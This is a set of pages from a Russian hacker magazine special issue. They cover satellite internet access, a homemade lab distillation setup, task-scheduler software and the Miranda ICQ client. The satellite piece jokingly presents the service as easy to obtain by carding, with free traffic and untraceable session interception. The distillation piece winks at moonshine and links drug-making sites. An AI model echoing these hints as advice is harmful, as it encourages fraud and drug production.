Так в чем же прикол? А в том, что спутниковый Инет просто теплое гнездышко для разного рода мошенничества. То, что ломать кодеки платных закрытых спутниковых каналов проще на компе, все наверное уже знают (хотя и об этом мы тоже как-нибудь постараемся поподробней, обещаю). Так вот, асимметричный доступ в Инет через спутник дает потенциальную возможность: получения многомегабайтной халявы для скачивания с Инета фильмов, музона, вареза, перехвата сессий других пользователей, при этом спутник дает некислую анонимность. Ну и, конечно, одновременно с Инетом ты сможешь смотреть спутниковое TV на компе. Принципы мошенничества старые, но сначала тебе надо подключиться!

Метод: что такое асимметричный доступ?

Про ассиметричный доступ в Инет через спутник нам проели уже все гланды. В Инете много статей про ЭТО. Но все кривые. Ощущения - как во время появления первого Инета в России. Когда покупка, установка модема и подключение к провайдеру казались чем-то невероятно сложным и неоправданно дорогим. Эх, скольким своим друзьям я настроил Инет в те веселые времена! И теперь я скажу вам, ребята: "Не бойтесь спутниковых модемов, они хорошие". Вот поставлю тарелку сначала себе, а потом нашим редакторам, и будет счастье!

Идея ассиметричного доступа не нова: подключаешь ты спутниковый модем к компу, а к нему тарелку. Все это дело может ТОЛЬКО ПРИНИМАТЬ сигналы. Для того чтобы к тебе на тарелочку полилось сладенькое, нужно заключить договор с провайдером спутниковой связи. Тут порадуются кардеры, поскольку спутниковый Инет реально накардить старыми добрыми методами WEB-мошенничества, поскольку неизвестно, из какой ты страны, и тебя не заблокируют только потому, что ты русский. Твоя тарелка только принимает, ничего не передает, поэтому тебя никак не запеленгуешь и никак не поймаешь! Но мы радоваться вместе с нехорошими кардерами не будем, а честно вложим кровно заработанные баблосы в поддержку спутникового Инета. Не забудь: Х с Добрянским против мошенничества, мы за безопасность!


Спецвыпуск Xakep, номер #029, стр. 029-088-2, Паяльник на службе WEB-мошенников

Паяльник на службе WEB-мошенников

Спецвыпуск Xakep, номер #029, стр. 029-088-2

После того как ты заключил контракт со спутниковым провайдером, ты можешь заказывать ему передавать на спутник нужные тебе данные. Причем заказанные данные будут транслироваться на всю территорию, охватываемую спутником! То есть плохие парни не только из России, но и из других стран потенциально могут перехватить получаемые тобою данные. Конечно, они могут быть шифрованы, но на всякие шифры найдется декодер.

Это мы все о получении, а вот заказывать данные тебе придется через наземный канал связи и через наземного провайдера Интернет. Ты можешь заказывать данные через модемный доступ, через GPRS с помощью сотового телефона или через локальную сеть. Поскольку отправлять тебе нужно только маленькие команды на скачку, то наземный канал может быть даже очень плохим. Приятно то, что ты можешь заказать по модему огроменный файл в 600 метров, отключиться и принимать его через тарелку. GPRS с оплатой за мегабайт траффика тоже получится очень выгодным, с помощью сотового телефона с поддержкой GPRS (подключенного к компу) и тарелки со спутниковым модемом ты сможешь провести себе Инет на дачу не дороже, чем в городе.

А вот для домашних сетей это просто зло. Фокус под названием: "Натяни свою локалку". Сейчас провайдеры локальных сеток совсем офонарели - дерут от 12 до 25-и центов за метр. Это значит, что компакт-диск (600 метров), слитый с Инета, будет стоить тебе от 72-х до 150 баксов!!! Причем каждая домашняя сеть - монополист в своем районе, пользователь не может уйти к конкурентам, потому что их нет! А теперь представь, что отправляешь в Инет через домашнюю сетку запросы на скачку файлов через спутник. Кстати, за эти запросы ты ничего не платишь, потому что исходящий траффик бесплатный. А получаешь ты назад все почти на халяву: от нуля до пятидесяти баксов за ГИГАБАЙТ. Плохие парни получают совсем на халяву. Аську, Ирку, почту, игры и чаты лучше пустить все-таки через локалку, они жрут немного траффика, зато быстрее работают.

Решение: что надо знать, чтобы организовать?

Я, конечно, буду ставить тарелку сам, но даже чтобы договориться с мастером, тебе понадобятся эти данные:

1) Стоимость оборудования:

- простенький спутниковый модем ~80 злобных президентов;

- тарелка с принимающей головкой ~50 вожделенных.

Получается не дороже обычного модема или стоимости подключения к домашней сети. Конечно, извращенцы могут купить супертарелку с суперприбамбасами за суперцену, но наш расчет на минимально необходимое.

2) Скорость:

- телефонный модем льет со скоростью 1-5 Килобайт в секунду;

- Интернет по выделенной линии через российского провайдера работает обычно от 20 до 50 килобайт в секунду, потому что каналы на запад узенькие (жмотярские);

- с компа на комп в большой локальной сети Ethernet 10mbit файл качается со скоростью от 200 до 500 Килобайт в секунду, потому что сеть обычно перегружена;


Спецвыпуск Xakep, номер #029, стр. 029-088-3, Паяльник на службе WEB-мошенников

Паяльник на службе WEB-мошенников

Спецвыпуск Xakep, номер #029, стр. 029-088-3

- со спутника скорость от 10 до 250 килобайт в секунду зависит только от политики провайдера.

3) Определение направления, выбор спутника, выбор провайдера:

Нам нужны геостационарные спутники, которые висят над определенной точкой земли. В их направлении указывает азимутальный угол. Этот угол зависит от позиции спутника и от координаты населенного пункта, где ты живешь. Твои окна или балкон должны выходить на спутник, чтобы ты смог направить на него антенну. Конечно, антенну можно поставить на крышу, но это уже другие деньги. Если твой друг-сосед живет в направлении нужного спутника, есть возможность юзать одну антенну на двоих, троих и вообще на всю тусовку.

В этой табличке я собрал провайдеров с терпимой ценой, которых смог найти. Цены даны очень примерно, для того чтобы ты смог прикинуть. На самом деле можно выбрать тарифный план подешевле, а можно заказать тестовый (бесплатный). Не у всех есть ограничение по объему траффика. Направление тарелки я рассчитал для Москвы с координатами 56:37. А чтобы можно было прикинуть: смотрит ли спутник в твою сторону, я рассчитал время, в которое солнышко находится в этом направлении зимой. Летом нужно добавлять час, потому что у нас часы переводят, солнцу-то пофиг! Для того чтобы получить время, когда в этот угол придет солнце, нужно азимут поделить на 15, а остаток от деления умножить на 60.

Угол возвышения - чем больше тем лучше. Особенно это важно для города, где высокие дома закрывают горизонт. Там, где ты собрался ставить тарелку, прикинь, не загораживает ли здание спутник!

Найдешь других прикольных провайдеров - пиши!

Список провайдеров здесь: http://www.rokc.ru/

Про солнце здесь: http://www.hiking.ru/orient/orient_times.htm

Про солнце и спутники здесь: http://www.sat2000.net/sputniktv/a.htm

Выбрав спутник и провайдера, ты можешь смело идти к антенщикам и просить поставить тарелку, все необходимое тебе предложат. Если ты хочешь попробовать все это самостоятельно, то оставайся с нами! Как только руки дойдут до установки, сразу об этом напишу в "Паяльник"!

Инструмент: прога для расчета направления на спутник.

Если ты нашел новый спутник или если ты живешь в другом городе, то эта программулина поможет тебе рассчитать азимутальный угол и угол возвышения, а также другие параметры тарелки. На той же странице ты найдешь пример, ссылку для скачки и ссылку для определения координат твоего города: http://www.gs.ru/?sect=sat_inet&s=Telstar-FAQ

Прога живет здесь: http://www.smw.se

Мнение: From: 5p1k3 <fallout@pisem.net>

Respect Доктор Добрянский,

присоединяюсь к общему празднованию по поводу появления ежемесячной рубрики "Паяльник" *<:-). Как всегда, хочется продолжения того, что было написано раньше в Хакере и Спеце. У меня тут такой вопрос: где можно купить нормальный паяльник? С регулятором температуры, нормальным жалом, etc, да и не за 100 буказоидов. А то везде либо их вообще нет, либо такие, какими только кузов от БелАЗа паять :), а все мои старые перегорели :(. Thanks in advance.


Спецвыпуск Xakep, номер #029, стр. 029-088-4, Паяльник на службе WEB-мошенников

Паяльник на службе WEB-мошенников

Спецвыпуск Xakep, номер #029, стр. 029-088-4

Ответ: и мы тоже очень рады ежемесячному "Паяльнику", здорово, если так пойдет и дальше! В Москве можно купить паяльник (не тот, который читают, а тот, которым паяют) на радиорынке, в радиомагазине у м. "Проспект Мира", да и вообще в любом хозяйственном магазине или вещевом рынке (если повезет).

Доктор Добрянский не несет ответственности за любой вред, принесенный в результате использования опубликованной информации. Все методы и схемы даны только в ознакомительных целях.


Спецвыпуск Xakep, номер #029, стр. 029-090-1, рабочее устройство: ПЕРЕГОННЫЙ АППАРАТ

рабочее устройство: ПЕРЕГОННЫЙ АППАРАТ

Деметрас + Д-р. Добрянский

Спецвыпуск Xakep, номер #029, стр. 029-090-1

(demetras@xakep.ru) + (Dr.Cod@real.xakep.ru)

Благодарность: благодарим сотрудницу лаборатории, которая помогла нам в подготовке материала, но пожелала остаться неизвестной.

ВСТУПЛЕНИЕ

Сейчас быстренько проведу беседу о вреде огненных жидкостей, поскольку в нашей стране с ними не совсем благополучно (дорогие). Ты до сих пор тратишь свои кровные, тяжким трудом заработанные деньги на эту дрянь? Проснись, ты отстал от прогресса! Сейчас модно пить чистую, дистиллированную воду! Нет ничего приятней (особенно летом на даче), чем эта прохладная и экологически чистая жидкость! Хотя злоупотреблять дистиллированной водой тоже не следует, так как это создаст недостаток минеральных веществ в организме.

ПРЕДУПРЕЖДЕНИЕ

Как можно увидеть на снимках, мы получали ТОЛЬКО дистиллированную воду. Такая вода долго не протухает, содержит малое количество солей. Потому ее очень удобно использовать для химических опытов, для создания самодельных батарей и аккумуляторов, для использования в системах охлаждения компьютеров. В водяной системе охлаждения современного компа такая вода не засорит капилляры солевыми отложениями и не протухнет. А если достичь высокой степени очистки от электролитов, сильно возрастет сопротивление воды до нескольких мегаОм. То есть водица станет безопаснее для электроники. О полезных свойствах чистой воды читай подробнее на сайте http://www.pereplet.ru/obrazovanie/stsoros/628.html. Без качественного дистиллята воды невозможно создание процессоров, микросхем и транзисторов для компьютера!

На этом агрегате также можно добыть эфирные масла из таких растений, как ель, мята, лепестки розы, гвоздики. То есть можно получить концентраты с этими запахами и попытаться сделать духи или одеколон собственного производства. Как ты догадался, богатое поле и для западла, так как отгонять с паром можно и экстракты гадостных запахов.

Овладев методом, можно научиться выделять из смеси многие вещества с температурой кипения ниже температуры пара. Из мыла можно выделить ароматизатор. А может ты научишься получать скипидар и канифоль (для пайки паяльником) из древесной смолы. Подробнее читай на http://www.alhimik.ru/read/grosse20.html.

Не скроем, что такой аппарат позволяет очищать много разных веществ, в том числе и алкогольные напитки. Или же есть возможность перегонять спиртовым паром душистые растения и плоды для получения настоек с разным вкусом и запахом. Однако это должны делать опытные специалисты, иначе возможны отравления и травмы!

Приходится признать, что модернизированные перегонные аппараты некоторые плохие несознательные люди используют для производства самогона, винта и других наркотиков, судя по сайтам: http://www.stopka.ru/drink/samogon/samogon33.shtml, http://shinin.narod.ru/vint.htm. Но Х против наркотиков! С помощью этой статьи мы хотим призвать всех заядлых алконавтов и наркоманов получать на своих перегонных аппаратах ИСКЛЮЧИТЕЛЬНО полезную дистиллированную воду!

КОНСТРУКЦИЯ И ФУНКЦИИ

Внешний вид перегонного аппарата в вытяжном шкафу, разберем его детально!


Спецвыпуск Xakep, номер #029, стр. 029-090-2, рабочее устройство: ПЕРЕГОННЫЙ АППАРАТ

рабочее устройство: ПЕРЕГОННЫЙ АППАРАТ

Деметрас + Д-р. Добрянский

Спецвыпуск Xakep, номер #029, стр. 029-090-2

Первая колба - парообразователь, под нее ставится нагреватель (в нашем случае электроплитка). При нагревании из колбы по трубке идет пар в следующую (отгонную) колбу. Из парообразователя идут две трубки. С первой понятно, а вторая специально никуда не подключена, она предназначена для регулирования давления, если ее заткнуть, то будет большой бум. Трубка давления должна быть в длину не меньше метра. Для равномерного кипения в парообразователь кидают "кипелки" из пористой керамики.

Допустим, ты купил на улице бутылку дешевой паленой водки и залил ее в отгонную колбу для получения чистого продукта для протирки всяких там компьютерных и не очень поверхностей.

Температура кипения спирта ~73С, в то время как температура кипения воды ~100С. Единственная трудность, которая тебя ожидает, - это подбор температуры нагрева именно для твоих целей. Испарение молекул спирта происходит за счет того, что они легче молекул воды. И в то время как молекулам воды еще не хватает энергии, чтобы полететь, молекулы спирта активно испаряются, оставляя в отгонном сосуде одну воду с вредными примесями.

Пар из парообразователя пробулькивается в виде пузырьков через смесь в отгонной колбе. При этом пузырек водяного пара частично замещается на более летучее вещество, которое летит в холодильник. При пробулькивании душистых растений - это эфирные масла; паленой водки или браги - спирт. Мы пробулькивали воду водяным паром и получали более чистый водяной пар.

Процесс начинается только после того, как отгонная колба хорошенько прогреется.

Холодильник состоит из двух трубок, находящихся одна в другой. По внутренней идет охлаждаемый пар, а внешняя трубка подключена к водопроводу, и по ней прогоняют холодную воду, охлаждая пар в трубке. В холодильнике пар конденсируется и превращается в капельки жидкости.

Капельки очищенной жидкости попадают в приемную колбу. Если это вода с эфирным маслом, то его собирают либо с поверхности воды, либо со дна сосуда. Если это спирт, то он просто разбавлен в воде. В нашем случае это просто чистая вода. Чтобы лучше очистить жидкость, ее снова заправляют в новый (чистый) отгонный сосуд и перегоняют заново.

В приемной колбе, как ты видишь, тоже есть регулятор давления, все для тех же целей (от большого бума).

Насадка Вюрца заюзана в нашей конструкции на всех трех колбах. Ее можно легко заменить резиновой пробкой с двумя дырками и трубками. Однако такая насадка работает в нашем случае как каплеулавитель, возвращая назад капельки жидкости. Входная трубка такой насадки идет почти до дна, а выходная улавливает пар у самого выхода из сосуда. Насадка Вюрца выполнена в виде притертой крышки. Колбы между собой соединены притертыми поверхностями и шлангами.

Схема агрегата! Закрепим полученные знания!

1) Из парообразователя выходит пар (голубая стрелка). При избытке давления вода (синяя стрелка) подымается по трубке и давление уравнивается.

2) В отгонном сосуде смесь нужного вещества. Мы ее пробулькиваем паром из парообразователя и получаем пар нужного вещества (розовая стрелка) и остатки пара из парообразователя (голубая стрелка).


Спецвыпуск Xakep, номер #029, стр. 029-090-3, рабочее устройство: ПЕРЕГОННЫЙ АППАРАТ

рабочее устройство: ПЕРЕГОННЫЙ АППАРАТ

Деметрас + Д-р. Добрянский

Спецвыпуск Xakep, номер #029, стр. 029-090-3

3) Пар поступает в холодильник, в котором циркулирует холодная вода (синие стрелки).

4) Из холодильника в приемный сосуд поступают остатки жидкости из парообразователя (синяя стрелка) и нужный дистиллят (красная стрелка).

Экспериментируя с парообразующей жидкостью и отгонной смесью, а также с температурами, можно отогнать хоть черта лысого!

ВЫВОДЫ

Не умеешь обращаться с аппаратом - не лезь! Незнакомые вещества не нагревай, а то все взорвется. Над аппаратом не наклоняйся, а то лицо испортишь. Продукты производства не нюхай и не пей, а то отравишься!

Всю стеклотару, увиденную тобой, при желании можно легко купить на любимом Mitino BaZZZaR, на "Птичьем" рынке или в химмагазе. При этом придется разориться на несколько сотен все еще деревянных. Однако не проблема изготовить многие узлы из подручных материалов.

Свойство воды при кипении - усиленно испаряться в виде пара, который создает давление на несчастный сосуд. При этом из сосуда (в нашем случае стеклянная колба) будет идти густой пар. Если этот пар подать через трубку в холодильник/змеевик, то он конденсируется и стечет в другую колбу в виде воды. Но! Это будет ДРУГАЯ вода, которая не будет содержать всей той отравы, текущей из крана в наших домах (хлорка, фекальные примеси, тяжелые металлы), собственно она вообще не будет ничего содержать, кроме молекул H2O и примесей незначительной концентрации.


Спецвыпуск Xakep, номер #029, стр. 029-092-1, ДОМАШНИЙ ГОСПЛАН - обзор планировщиков задач

ДОМАШНИЙ ГОСПЛАН - обзор планировщиков задач

Kirion (kkr@mailru.com)

Спецвыпуск Xakep, номер #029, стр. 029-092-1

Часто бывает так, что нужно уйти по неотложным делам или сделать работу по дому, или банально поспать. А комп в это время ничем не занят. Не выполняются трудоемкие и долгие процессы, не используется халявный ночной Инет. А как бы было хорошо, если бы в твое отсутствие ни одна секунда процессорного времени не пропадала зря. Думаешь, нереально? Собственно, я не понимаю, что тебе мешает...

Интегрированное планирование

...Ибо всем известно, что существует достаточно большое количество программ, выполняющих функции планировщика. Такая программа даже есть в... Кто сказал - встроенный планировщик? Мальчик, встань, покажись аудитории. Как тебя зовут, мальчик? Так тебя зовут Билли! Поприветствуем все Билли, охрана, выведите его из зала. Так вот, даже в винду встроен планировщик задач. Не то что бы он отличался большой функциональностью, но это уже не просто будильник :). Планировщик задач представляет собой апплет из панели управления или команду консоли At. Итак, "панель управления" > "назначенные задания" > "добавить задание". Если на компе нет назначенных заданий, то при запуске "мастера планирования заданий" возможен небольшой подвисон - это стартует служба планировщика. Выбираем прогу, тип запуска (каждый день, неделю, месяц, один раз, при загрузке, при входе), время запуска и пользователя, под чьим именем будет выполняться задание. После создания задания можно всегда подкорректировать его свойства, а также задать максимальное время на выполнение задания, запуск задания через определенное время простоя компа и параметры, связанные с энергопотреблением. Если для создания задачи используется команда At, то можно создать задачу на удаленном компьютере. Вот вроде и все возможности встроенного планировщика. Много чего не хватает для полного счастья, однако в сочетании с командным языком виндовой консоли можно создавать достаточно навороченные батники, которые будут удовлетворять почти всем твоим запросам.

Всемогущий Кронос

Если при прочтении последних строчек про написание батников в cmd ты брезгливо поморщился, то тебе точно не стоит ставить прогу nnCron (www.nncron.ru). Юниксоиды без труда вспомнят, что демона-планировщика для юниха кличут Cron'ом. Создатель nnCron, видимо, хотел повторить его функциональность, и это ему удалось. Более того, nnCron гораздо функциональнее и удобнее своего собрата. Несмотря на то, что задания достаточно удобно добавлять и через гуевый интерфейс (а тут есть задания и напоминания a la будильник), истинная мощь проги достигается при ручном написания crontab-файлов. Их синтаксис частично заимствован из Cron'а, но в основном представляет собой конструкции языка Форт, на котором написан и сам nnCron (признаюсь к своему стыду, до того, как залез в доки к проге, и не подозревал, что есть такой язык - Форт). С помощью визуального интерфейса можно создавать задания, выполняющиеся по времени и через определенные интервалы времени (это стандартно), а можно создавать задания, выполняющиеся по событию. Среди возможных событий: загрузка и выключение компьютера, вход пользователя, установление и разрыв связи и другие. Особенно меня привлекает событие: нажатие клавиши. nnCron может служить неплохим менеджером горячих клавиш, вот уж не ожидал :). А еще можно задать несложное условие для задания вроде наличия связи, открытого окна или запущенного процесса, существования файла. Кстати, в качестве заданий может выступать не только запуск прог или открытие документов, но и запуск java и vbscript, установка связи, закрытие окон, завершение процессов и прочее. Неплохие возможности, не так ли? Но если ты думаешь, что это все, на что способна прога, - загляни в доки, тебе станет плохо :). Если программировать crontab-файлы вручную - то станет возможным написание задание с ветвлением if... else... конструкции case. Можно отслеживать изменения на веб-страницах и локальных папках, следить за доступностью определенных хостов, работать с реестром и удаленными соединениями, сворачивать окна в трей. Посылать сообщения окнам, выполнять перемещение курсора и ввод с клавиатуры. Доступны средства удаленного администрирования (просто подсоединяешься с помощью telnet на указанный в настройках порт и работаешь с консолью nnCron). Кроме того, nnCron поддерживает регулярные выражения в духе перла (отличия незначительные), так что поиск и замена не должны представлять проблему. Единственный возможный минус - в Форте используется так называемая инверсная польская запись, а к ней сложно привыкнуть (для тех, кто в первый раз о таком слышит, приведу простой пример инверсной записи: 4 2 +. Это означает 4+2. Или посложнее: 2 3 4 1 + - +. Это означает 1+4-3+2. Конструкция условного оператора выглядит так: "условие" if "действие" else "действие" ). Хотя это дело практики, а ради таких возможностей можно и попрактиковаться :). Ко всему вышесказанному можно добавить, что программа является бесплатной для жителей бывшего СССР (обожаю таких программистов :)), весит всего 350 кило. Почти столько же весит файл справки в chm :). Настоятельно рекомендую скачать его с сайта автора, равно как и небольшой справочник по Форту - писать кронтабы станет не в пример легче :).


Спецвыпуск Xakep, номер #029, стр. 029-092-2, ДОМАШНИЙ ГОСПЛАН - обзор планировщиков задач

ДОМАШНИЙ ГОСПЛАН - обзор планировщиков задач

Kirion (kkr@mailru.com)

Спецвыпуск Xakep, номер #029, стр. 029-092-2

Часики

Консоль и сценарии это, конечно, клево, юзер теперь ленивый пошел. Визарды портят людей :). Мдя, что бы тебе предложить-то... Ну, хотя бы Chameleon clock (www.softshape.com). Очень популярные и симпатичные часики обладают также и планировщиком задач. По функциям он уступает nnCron (это мягко говоря), зато все красиво и просто. В планировщике все стандартно: запуск приложения или документа в определенное время или через определенный интервал. Поддерживается также запуск по событию, но их всего три: вставка диска, передвижение указателя в угол экрана (оригинально и удобно) и простой компьютера определенное время. Хотя лично для меня функции планировщика в этой проге не важны - я использую ее как замену стандартным часикам и как календарь. Она ведь умеет рассчитывать ПМС :). Просто зайди на закладку "Periods watch". А теперь о грустном: прога хочет денег, вне зависимости от твоей национальности :(. Хотя программер вроде как русский. Но Chameleon clock очень популярные часики, так что как-нибудь выкрутишься :). Ну и второй минус - диспетчер задач фиксирует отжирание почти 12 мегов памяти (nnCron жрет всего 1.5). Куда ей столько - непонятно. У меня антивирус вместе с фаерволлом кушают столько же.


Спецвыпуск Xakep, номер #029, стр. 029-092-3, ДОМАШНИЙ ГОСПЛАН - обзор планировщиков задач

ДОМАШНИЙ ГОСПЛАН - обзор планировщиков задач

Kirion (kkr@mailru.com)

Спецвыпуск Xakep, номер #029, стр. 029-092-3

Призрак времени

Если ты хочешь воспользоваться каким-нибудь другим планировщиком - лезь на любой сайт с бесплатным софтом и качай, особо не глядя. Отличаются между собой только интерфейсом, мало кто далеко уходит от обычного будильника. Лучше уж использовать планировщики заданий, которые встроены в софт. Встроенный планировщик есть во многих продуктах от Symantec (вот тебе и проверка диска, дефрагментация, скан на вирусы), в известных качалках (Flashget, Reget, Getright) и оффлайновых браузерах (Teleport pro, WebZip). Недавно появился планировщик задач во всенародно любимом The Bat!. Надо же юзать ночной Инет по полной :). Ну а для стопроцентной автоматизации не забудь настроить включение компа по таймеру из биоса и добавить в софт задачу для выключения - и пусть ничто не прерывает твой сон. Кроме любимого оверклокерского кулера и новейшего тихого винта :). Пусть тебя убаюкают мысли о звуконепроницаемом корпусе и водяном охлаждении :).

Так вот, даже в винду встроен планировщик задач. Не то что бы он отличался большой функциональностью, но это уже не просто будильник :).

Юниксоиды без труда вспомнят, что демона-планировщика для юниха кличут Cron. Создатель nnCron, видимо, хотел повторить его функциональность, и это ему удалось.

Ну и второй минус - диспетчер задач фиксирует отжирание почти 12 мегов памяти (nnCron жрет всего 1.5).


Спецвыпуск Xakep, номер #029, стр. 029-094-1, Miranda ICQ

Miranda ICQ

Андрей "Дронич" Михайлюк

Спецвыпуск Xakep, номер #029, стр. 029-094-1

(dronich@real.xakep.ru)

Случилось в моем доме несчастье... Мой ноутбук, доселе работавший без глюков и перебоев (грамотный уход, мафака!), неделю назад получил на винчестер порцию десерта, именуемую в простонародье третьим сервиспаком. И началось... Несусветные глюки с памятью, слепой ИК-порт, переставшие работать хардварные хоткеи... Короче, понял я, что не избежать мне тотального перехода на ХР, ибо возможность анинсталла SP3 была мной предусмотрительно отключена :).

Но это все лирическая присказка, в результате которой я стал заниматься архивацией доков, заливкой на болванки дистрибов и кряков, а самое главное - судорожным запоминанием текущих настроек прог, которые были отточены до оптимума. И тут как раз возникла идея поделиться этим оптимумом с тобой. Так что если тема архиправильной расстановки чекбоксов будет тебе близка, обязательно накатай мне письмецо на эту тему. Может быть, эта статейка положит начало целому авторскому циклу :).

А начну я с полезнейшей проги, которую я бесстыдно забыл в обзоре альтернативного софта в прошлом номере. Это Miranda (http://miranda-icq.sourceforge.net/), аська на восьмушку дискеты. И пусть Кирион и ему подобные захлебнутся слюной, доказывая преимущество Trillian (кстати, конструктив принимается по мылу), переубедить меня будет до жути сложно. И вот почему.

СУТЬ

Что есть Миранда? Миранда есть простой и понятный клиент сетей мгновенного обмена сообщениями. Именно сетей, а не сети - на данный момент она поддерживает ICQ, AOL, MSN и Jabber. Причем все протоколы подключаются простым копированием dll-плагинов в директорию проги :). Есть даже плагин Lizard Skin, да вот беда - проект загнулся, и скинов теперь никто не делает :(. Но это не беда, мне лично по уши хватает изменяемой прозрачности окна :). Но к делу, а то рассказ получится эмоциональным, но бессистемным :).

ФИЧИ И ДЕБРИ

Многими ли приятными вещами может нас накормить Миранда в стандартной поставке? Если учесть, что весит она меньше 300 кило в архиве, то многими :). Поскольку по-русски ты читать умеешь, я не буду расписывать названия опций, а уж найти, где поставить галку, - дело нехитрое. Соответственно, совсем простые разделы я пропущу и оставлю тебе на растерзание :).

Итак, основные приятности спрятаны в менюхах:

Сеть

+ пинговать сервак липовыми мессагами, чтобы нас не отрубало за бездействие, очень полезная штука на диалапе, у меня за счет Миранды держится вся связь.

+ получать реальные подтверждения о доставке сообщения

тоже полезно, но создает некоторые проблемы с оффлайн-мессагами.

+ регулировать детальность сообщений об ошибках,

четыре вполне внятных уровня, первый для пофигистов, последний для параноиков (у меня последний :)).

+ прямые соединения

советую выставить только для контакт-листа - это полезно в плане скорости, но светит айпишник (его можно посмотреть в логах любого файрволла или вообще стандартными сетевыми утилами).

+ контакты

тут у меня стоят все галки, причем иногда я нажимаю на "управление списком" и перезаливаю лист на сервер - надежности для :). А хранение списка на серваке позволяет мне запустить с работы ICQ2GO! (http://go.icq.com/) и наслаждаться своим контакт-листом. Такая вот клиентонезависимость :).


Спецвыпуск Xakep, номер #029, стр. 029-094-2, Miranda ICQ

Miranda ICQ

Андрей "Дронич" Михайлюк

Спецвыпуск Xakep, номер #029, стр. 029-094-2

События

+ журнал

обойдемся без советов, детализацию и отображение логов каждый выбирает сам :). Я вот, к примеру, отключил только "Время" и убрал гадкий красный шрифт, которым печатались мои сообщения.

+ звуки

звуки сразу на фиг! Но не навсегда :). Потерпи чуток, скоро доберемся до плагинов, и ты поймешь, почему я так скептичен ;).

+ игнор-лист

я пока сделал только одно - отключил прием урлов от невесть кого, ибо это есть самый злобный спам :). Остальное - по вкусу.

+ передача файлов

обязательно (!) включить докачку. Она работает! :))).

Контакты

+ значки

вот это просто песня! Для каждой сети можно подключить свои значки статуса пользователей, пунктов меню и трея. Причем в контакт-листе могут свободно соседствовать разноцветный гербарий аськи, бегущие дистрофаны AOL'a, безногие телепузы MSN'a и лампочки Ильича Jabber'a. Все стандартные иконки для ВСЕХ сетей можно слить одним паком, что не может не радовать (пак называется Original Gangsta Icons).

+ окно

тут снова все персонально, но не может не радовать настройка прозрачности. У меня окошко висит в фоне с прозрачностью 50, а при наведении на него мышки резко плотнеет до 90. Еще очень полезная опция - "Растягивать вверх", когда при чрезмерном увеличении листа окно не лезет краем на трей, а "вырастает" вверх.

Все остальные настройки весьма стандартны для любых клиентов, и к чести разработчиков их еще до хрена :). Не поленись и пробеги все глазами, авось попадется что-то потребное именно тебе :). А мы движемся дальше.

ПЛУГИНЫ ака МОДУЛИ

В первый же день после скачки релиза Миранды (эта была версия 0.2) я скормил Телепорту весь сайт http://miranda-icq.sourceforge.net/ и подключил почти все плагины. Потом убрал кучу малополезных просто за ненадобностью, потом убрал дублирующие друг друга модули, и в итоге получил примерно следующий состав:

Atomic

Просто корректирует системное время по атомным часам. Никогда я не пользовался прогами, которые это делают (так как их надо было отдельно запускать), хотя все часы в доме ходили, как хотели :). Теперь у меня есть хотя бы одни точные - на компе, благо раз в день и чаще они сверяются с эталоном.

ChangeInfo

Этот модуль устраняет один из главных минусов Миранды - до его установки она может показывать твои детали, но для их редактирования просит пользоваться сайтом :(. Неэтично. ChangeInfo просто добавляет еще одну закладку в панель "Личные данные", с которой можно поправить всю свою приватно-общественную инфу.

Contactsex

Я сначала думал, что этот плуг пропишет мне в контакты дэушек, которых сильно обременяет их девственное состояние :). Однако это оказалось совсем не так :) (а может и :(, кто знает...). После его установки в контекстном меню каждого из твоих контактов появится одна или несколько (как настроишь) опций из списка: "полученные файлы", "сайт юзера", "последний раз в сети" и "копировать IP". У меня включены первая и последняя, ты же выбирай сам.


Спецвыпуск Xakep, номер #029, стр. 029-094-3, Miranda ICQ

Miranda ICQ

Андрей "Дронич" Михайлюк

Спецвыпуск Xakep, номер #029, стр. 029-094-3

StatusFloater

Просто и со вкусом - позволяет настроить маленький попап, вываливающийся каждый раз, когда отмеченный тобою юзер меняет статус на онлайн/оффлайн. Также эта байдовина позволяет выносить контакт в отдельное окошко. Очень удобно, когда кого-то трудно отловить. Рекомендую всем, кто хочет отловить меня :).

NewStatusNotify

А вот эта фишка будет покруче предыдущего плагина, это практически оперативный центр слежения за юзерами. Умеет очень многое, следит за изменением статуса даже с "Ушел" на "Ушел совсем" :). Начинающим СОРМовцам пригодится стопудово.

SleepMode

Полезность этой штуковины для диалапщиков просто колоссальна! Она отслеживает модемные соединения и в случае их нахождения :) меняет статус на "онлайн" автоматически. Ну разве не прелесть для наших бажных линий, обогащенных дисконнектами? If MODEM_USER = true then must have.

Speak

Вот и приехали! Я считаю этот плагин одним из самых полезных и функциональных, а уж о понтах я даже не заикаюсь. Итак, Speak работает на базе стандартного СпичАпи виндов и занимается комментированием событий, зачитыванием сообщений и приветствием хозяина :). До этого я очень скептически относился к голосовым фичесам - развлечение, девчонок постремать да и все. Но в Миранде Speak стал для меня заменой почти всем возможным плагинам :). Эта сволочь начала покорять меня еще на стадии настройки - не успел я снять галку с "Не читать длинные мессаги", как из колонок полился ровный бас: "Я буду зачитывать сообщения независимо от их длины". Шарман, мля :). А после соответствующей корректировки lng-файла, в котором прописаны все его фразы, Speak стал настоящим безбашенным киберпанком. И в конце концов, просто удобно просматривать сайт и слушать музыку, на фоне которой звучат все полезные и бесполезные сообщения тебе :). Кстати, под ХР Speak должен работать еще лучше, так как версия SAPI в нем подросла и научилась разбираться с лексиконом. Кто знает, может через пару дней я научу эту заразу озвучивать смайлики :))). Кстати, в отличие от подобного расширения для простой аськи (хоть убей, не помню, как оно зовется), Speak отлично работает и в режиме чата (а не только Single Message).

OVER

Вот и все на сегодня, с одной из полезных и нужных программ разобрались. В следующий раз мы помучим кого-нибудь другого, а если тебе понравится, то наш БДСМ будет продолжаться. До скорых встреч на страницах WINfo!

Miranda is popular among users because it gives them freedom to do what they want, how they want.

Martin Oberg aka Strickz

Miranda IM project administrator

И снова Дронича пробило на общение с разработчиками :). Выцепив в сети Мартина Оберга, я задал ему пару ласковых по поводу Миранды. Лог на буржуйском выложен на воскресшем winfo.org в разделе статей.

D: Первый глупый вопрос: зачем была написана Миранда? В чем была фишка проекта?

МО: Три года назад некий FixBug начал кодить альтернативный клиент для сети ICQ, так как продукты Мирабилиса были тормознутыми и бажными. Упор был сделан на минимальное использование памяти и проца. Кстати, этой идее мы верны до сих пор, хотя теперь Миранда держит гораздо больше протоколов.


Спецвыпуск Xakep, номер #029, стр. 029-094-4, Miranda ICQ

Miranda ICQ

Андрей "Дронич" Михайлюк

Спецвыпуск Xakep, номер #029, стр. 029-094-4

D: Кто занимается написанием плагинов под Миранду? Вас спрашивают, что было бы прикольно накодить, или кодят на свой страх и риск?

